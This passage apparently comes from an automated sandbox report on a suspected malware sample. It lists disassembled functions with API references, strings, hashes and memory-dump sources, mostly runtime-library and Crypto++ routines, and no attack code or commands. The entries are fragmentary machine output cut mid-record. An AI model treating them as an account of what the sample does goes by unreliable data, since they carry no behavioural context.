                                          Strings
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: .PBF$w#G!
                                          • API String ID: 323602529-4168750012
                                          • Opcode ID: b6b516bf528111990e610e817307cfed3821908684f0fe0fb10e235e4e06943b
                                          • Instruction ID: 5413d81c5cec7e1ae196902bc9fcfab0e3af2ab8454437e372f8bd876d9548f9
                                          • Opcode Fuzzy Hash: b6b516bf528111990e610e817307cfed3821908684f0fe0fb10e235e4e06943b
                                          • Instruction Fuzzy Hash: B6412274A08246CFD711CF29C588AA9FBE9FF49708F1581ADE8098B391D731E955CF50
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009EE6F8
                                            • Part of subcall function 009ECC20: ___std_exception_copy.LIBVCRUNTIME ref: 009ECC63
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EE7E7
                                          Strings
                                          Similarity
                                          • API ID: ___std_exception_copy$___std_exception_destroy
                                          • String ID: w#G!
                                          • API String ID: 4019986568-519468572
                                          • Opcode ID: 4a4daf961d7285216b8801b1ed6cabb96157325a0b444e008d313804504b6710
                                          • Instruction ID: 70abdccf938d469a5b568755f0828ddda1809c3cc72fdbc88a26762ba811d85b
                                          • Opcode Fuzzy Hash: 4a4daf961d7285216b8801b1ed6cabb96157325a0b444e008d313804504b6710
                                          • Instruction Fuzzy Hash: 72414FB5A10649EFCF04CF58D944A9DFBF4FF48308F108259E918AB711D771A904CBA4
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A7E5C4,00000000,00000050,?,?,?,?,?), ref: 00A7E444
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 6c347a0f166bf6c98ee6de14502798c23ac2ec17396a5a99ac1e7be92a734a18
                                          • Instruction ID: 55da38ec23e2ec83678d91b46f67ba66a6da3ae36e3e352536c5a3f1ad16f06b
                                          • Opcode Fuzzy Hash: 6c347a0f166bf6c98ee6de14502798c23ac2ec17396a5a99ac1e7be92a734a18
                                          • Instruction Fuzzy Hash: 6021A473B40100A6EB34CB648D41B9773A6AB59B10F5AC5A4E90EDB241F733DD008350
                                          APIs
                                            • Part of subcall function 00A2D7E7: __EH_prolog3_GS.LIBCMT ref: 00A2D7F1
                                          • std::_Stofx_v2.LIBCPMT ref: 00A342D4
                                          • _ldexpf.LIBCPMT ref: 00A3431A
                                          Strings
                                          Similarity
                                          • API ID: H_prolog3_Stofx_v2_ldexpfstd::_
                                          • String ID: w#G!
                                          • API String ID: 1444608790-519468572
                                          • Opcode ID: 0eba0118abaaf4923037c05b6c2e33267a9c058204c86da8855168284c5873fe
                                          • Instruction ID: babada3d116174ab1ed97bf816163c9489ce78c93ddaec0b421f3057e8d78c28
                                          • Opcode Fuzzy Hash: 0eba0118abaaf4923037c05b6c2e33267a9c058204c86da8855168284c5873fe
                                          • Instruction Fuzzy Hash: 19312C71A002199BCB15DF58DD81AEAB7BCEF0C300F9091AAF51AA7141D734AF54CF64
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3E865
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: boost::filesystem::path codecvt to string$w#G!
                                          • API String ID: 2005118841-2763089600
                                          • Opcode ID: 022478f60478b5bae23e7070a8b8add15dec3929f585ab24783a4f8bb4f045f2
                                          • Instruction ID: 0998d4d6eaca742d0f2bc8d981c3eb6dbea5b134aa715330efd478f185fb8aa2
                                          • Opcode Fuzzy Hash: 022478f60478b5bae23e7070a8b8add15dec3929f585ab24783a4f8bb4f045f2
                                          • Instruction Fuzzy Hash: F3218676A04314AFC704DEA8DD8586BB3E9EFC9300F040A1DF94197240D670FC088BA2
                                          APIs
                                            • Part of subcall function 00A2DEC1: __EH_prolog3_GS.LIBCMT ref: 00A2DECB
                                          • std::_Stofx_v2.LIBCPMT ref: 00A34C0F
                                          • _ldexpf.LIBCPMT ref: 00A34C55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3_Stofx_v2_ldexpfstd::_
                                          • String ID: w#G!
                                          • API String ID: 1444608790-519468572
                                          • Opcode ID: 9cc8275767d0675b10c698d7e0616edc9d6295241130ff0a68278ca34e02e689
                                          • Instruction ID: 0574e4b1a537e5dc9a3cc83025b0735bb217181b7cb0de57f30179a5f8d4bdeb
                                          • Opcode Fuzzy Hash: 9cc8275767d0675b10c698d7e0616edc9d6295241130ff0a68278ca34e02e689
                                          • Instruction Fuzzy Hash: 96314B719012199BDB15DF54DD81AEAB7BCEB4C300F44919AF50AA3141D734AF55CF60
                                          APIs
                                            • Part of subcall function 009E7780: std::locale::_Init.LIBCPMT ref: 009E77C5
                                            • Part of subcall function 009E61A0: std::_Lockit::_Lockit.LIBCPMT ref: 009E61FA
                                            • Part of subcall function 009E61A0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009E6242
                                            • Part of subcall function 009E61A0: __Getcvt.LIBCPMT ref: 009E624B
                                          • std::locale::_Init.LIBCPMT ref: 009DED8E
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                            • Part of subcall function 009EB050: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 009EB06D
                                            • Part of subcall function 009EB050: std::_Lockit::_Lockit.LIBCPMT ref: 009EB08D
                                            • Part of subcall function 009EB050: std::_Lockit::~_Lockit.LIBCPMT ref: 009EB0AE
                                            • Part of subcall function 009EB050: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 009EB0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockitstd::locale::_$Lockit::_$InitLocimp::_Lockit::~_$AddfacGetcvtH_prolog3LocimpLocimp_Locinfo::_Locinfo_ctorNew_Setgloballocale
                                          • String ID: Dflt$w#G!
                                          • API String ID: 4135119788-2762319387
                                          • Opcode ID: 3dbf0911d24590fb1280bcbdcf66fcaba9c83ecd55eb2784829db2874a2b3785
                                          • Instruction ID: 5bb7dc44f0bee47b8b1fe2825284a913418e4a4fa915ae54a7e4491197cad27c
                                          • Opcode Fuzzy Hash: 3dbf0911d24590fb1280bcbdcf66fcaba9c83ecd55eb2784829db2874a2b3785
                                          • Instruction Fuzzy Hash: 3B31AA70A00A44DFD711EF64C944B6ABBF4FF48700F14866DE6069BB91DB72A944CB91
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009D0F7E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: .PBF$w#G!
                                          • API String ID: 323602529-4168750012
                                          • Opcode ID: 06c6dd9822e5039838acdf824f09c9268355e000948cd36dc5f1728cf581d5ba
                                          • Instruction ID: dc1792562596557bf220d6d422ba974b62f5a71f9a625631710d71d793f3ac8d
                                          • Opcode Fuzzy Hash: 06c6dd9822e5039838acdf824f09c9268355e000948cd36dc5f1728cf581d5ba
                                          • Instruction Fuzzy Hash: D2314B75604206CFC722CF29C588BA9FBF9FF49704F1482ADE8099B351D771A916CB50
                                          APIs
                                          • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00A6AB2E,E0830C40,?,00A7575F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A753CC
                                          • GetLastError.KERNEL32(?,00A7575F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76,00A6AB2E,?,00ACCEE0,00000014,00A61B64,00000000,8304488B,00A28F76), ref: 00A753F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: w#G!
                                          • API String ID: 442123175-519468572
                                          • Opcode ID: a588af528d39a77293129558fbb530d4041e4633d89064a84d3e95b8476691de
                                          • Instruction ID: 93dd7eb430b3e8813ea759ef48e03896b98ad55b286e322772986fcf2adfc539
                                          • Opcode Fuzzy Hash: a588af528d39a77293129558fbb530d4041e4633d89064a84d3e95b8476691de
                                          • Instruction Fuzzy Hash: BB317575B00615DBCB24CF6ACD809DAB3F5EF48341B1485AAE50DD7260E7B0AD85CB54
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F65E1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • : this object doesn't support a special last block, xrefs: 009F65B2
                                          • w#G!, xrefs: 009F6544
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: : this object doesn't support a special last block$w#G!
                                          • API String ID: 3976011213-1747694321
                                          • Opcode ID: 7a845b52a253545942d394806d327422cf862cb6abc8a3355255d9ca0d256268
                                          • Instruction ID: 83e775c4d598bce8d8943175ea2729ef6fd25faabc83f5beb08102cf55924ec0
                                          • Opcode Fuzzy Hash: 7a845b52a253545942d394806d327422cf862cb6abc8a3355255d9ca0d256268
                                          • Instruction Fuzzy Hash: 29215076A00308AFCB11DFA4D945FEEBBB8FB48710F004559F915A7381DB74A914CB90
                                          APIs
                                          • __Mtx_unlock.LIBCPMT ref: 009EB214
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          • __Mtx_init_in_situ.LIBCPMT ref: 009EB1A6
                                            • Part of subcall function 00A293E0: Concurrency::details::create_stl_critical_section.LIBCPMT ref: 00A293EB
                                            • Part of subcall function 00A40C27: __onexit.LIBCMT ref: 00A40C2D
                                            • Part of subcall function 00A40750: EnterCriticalSection.KERNEL32(00AD87E8,?,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4075A
                                            • Part of subcall function 00A40750: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4078D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Concurrency::details::create_stl_critical_sectionMtx_init_in_situMtx_unlock__onexit
                                          • String ID: w#G!
                                          • API String ID: 910381318-519468572
                                          • Opcode ID: 88a2b75f55024a45533831b3331519dc395715591784a9b60a00e1812d99a7ca
                                          • Instruction ID: 006bdf59c58bcf73867744ab08f9fdbe8930053b5d61f63b57857ccbac7a9613
                                          • Opcode Fuzzy Hash: 88a2b75f55024a45533831b3331519dc395715591784a9b60a00e1812d99a7ca
                                          • Instruction Fuzzy Hash: 0D21F9B1A40250AFD711DB95ED02F5B33A8FF14B20F044A36F91797781E775AD008B82
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B6BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: w#G!$w#G!
                                          • API String ID: 2005118841-1134387879
                                          • Opcode ID: 0542620000043b6db9170b79c27014c1ec38ea3d4cc6b261e568a84e66d91918
                                          • Instruction ID: f6391f4a1cfb3a9cc27bef9c02416f053f5cee2619fbfac541d1fd69fcc76895
                                          • Opcode Fuzzy Hash: 0542620000043b6db9170b79c27014c1ec38ea3d4cc6b261e568a84e66d91918
                                          • Instruction Fuzzy Hash: D111E631908758ABCB10EBA4D941BDABBBCEB05714F04456EF91597681D7B5B9008780
                                          APIs
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                          • String ID: w#G!
                                          • API String ID: 3286764726-519468572
                                          • Opcode ID: 12be384398c99cff52daee0ec52a3859423a7c1072503639e1fb5167563feefa
                                          • Instruction ID: 8ede57aa83e3203f56e7f4479d126c3b87474983b696ec74adbc32a131c3cb82
                                          • Opcode Fuzzy Hash: 12be384398c99cff52daee0ec52a3859423a7c1072503639e1fb5167563feefa
                                          • Instruction Fuzzy Hash: DD11F1F1A007405BDB30EF65DE49B67B7ECEB14710F048629E84E97681EB75E9048B92
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00A72D56
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A72D63
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID: w#G!
                                          • API String ID: 2279764990-519468572
                                          • Opcode ID: 6656eefbc7f78baf7554ce3c887971fcdc5b78c7274b22843219142a3dff5b03
                                          • Instruction ID: 7c64c691b09a16f8a9fb1a2a0e6e3107e02f98a67ce4e5bf833b1d78c4a5b0ad
                                          • Opcode Fuzzy Hash: 6656eefbc7f78baf7554ce3c887971fcdc5b78c7274b22843219142a3dff5b03
                                          • Instruction Fuzzy Hash: 9211C637A006219F9B32DF69EC50B5B73A5EB8476071BC220FE19AB256E630DC0287D0
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F8DF1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • PK_MessageEncodingMethod: this signature scheme does not support message recovery, xrefs: 009F8DC8
                                          • w#G!, xrefs: 009F8DB4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: PK_MessageEncodingMethod: this signature scheme does not support message recovery$w#G!
                                          • API String ID: 3976011213-1159209045
                                          • Opcode ID: 907217d7418d8ef818daf77bc85bfa973fda7cd6f931447a5aaeae22a4649d4f
                                          • Instruction ID: 72122f9c940e559cc01eb0277ee8271f4484cdb2a293f4cea1e2af6dcd96b8ea
                                          • Opcode Fuzzy Hash: 907217d7418d8ef818daf77bc85bfa973fda7cd6f931447a5aaeae22a4649d4f
                                          • Instruction Fuzzy Hash: 4F015E71914208BBCF01EF90DD02FEFBBA8FF44724F410929F91176291EB71A919C6A1
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A417A0
                                          • ___raise_securityfailure.LIBCMT ref: 00A41887
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: w#G!
                                          • API String ID: 3761405300-519468572
                                          • Opcode ID: 472751e101c90877446c78643bcb132d460a41749d2e79d2dde4e5474da2581a
                                          • Instruction ID: e72032675ec5ceb9e4ecc7f7a08615d52785e873c78f2926a95cf51b22f1db6d
                                          • Opcode Fuzzy Hash: 472751e101c90877446c78643bcb132d460a41749d2e79d2dde4e5474da2581a
                                          • Instruction Fuzzy Hash: A72137B8503300DED710CF99FDA5A243BE4FB48754F50446BE6468B3A0EBB84482CF46
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F7338
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : this object cannot use a null IV$w#G!
                                          • API String ID: 2005118841-1087617168
                                          • Opcode ID: eb52016635c714b036a8415d78ca1de908dbb43e3523f3962060186845f7da7f
                                          • Instruction ID: d31ee3d9bf923619f38f9e83e324e9fceaea8fbbcc7eac88cf447d136f3c5485
                                          • Opcode Fuzzy Hash: eb52016635c714b036a8415d78ca1de908dbb43e3523f3962060186845f7da7f
                                          • Instruction Fuzzy Hash: 21119175A04248EFCB15DFE4C845FEEBBB8FB08710F104669F91697281DB74A904CB90
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B64EE
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B64B4
                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 009B64C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: RandomNumberGenerator: IncorporateEntropy not implemented$w#G!
                                          • API String ID: 3976011213-434694297
                                          • Opcode ID: 1f0375b6284c0b6e9e55dbbb738d147fcad8624c2c286c6cc0a1982c442d0abc
                                          • Instruction ID: 7407525bc1168dc03dd92ab939bad818f382dbc65f1ccc2e69d2ff9f8d43dcf6
                                          • Opcode Fuzzy Hash: 1f0375b6284c0b6e9e55dbbb738d147fcad8624c2c286c6cc0a1982c442d0abc
                                          • Instruction Fuzzy Hash: 3DF03071940608EBC705EF95DD42FDD77FCFB08714F510665A911A3590DB35AA04CA90
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B848B
                                          Strings
                                          • w#G!, xrefs: 009B8434
                                          • CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 009B8462
                                          Memory Dump Source
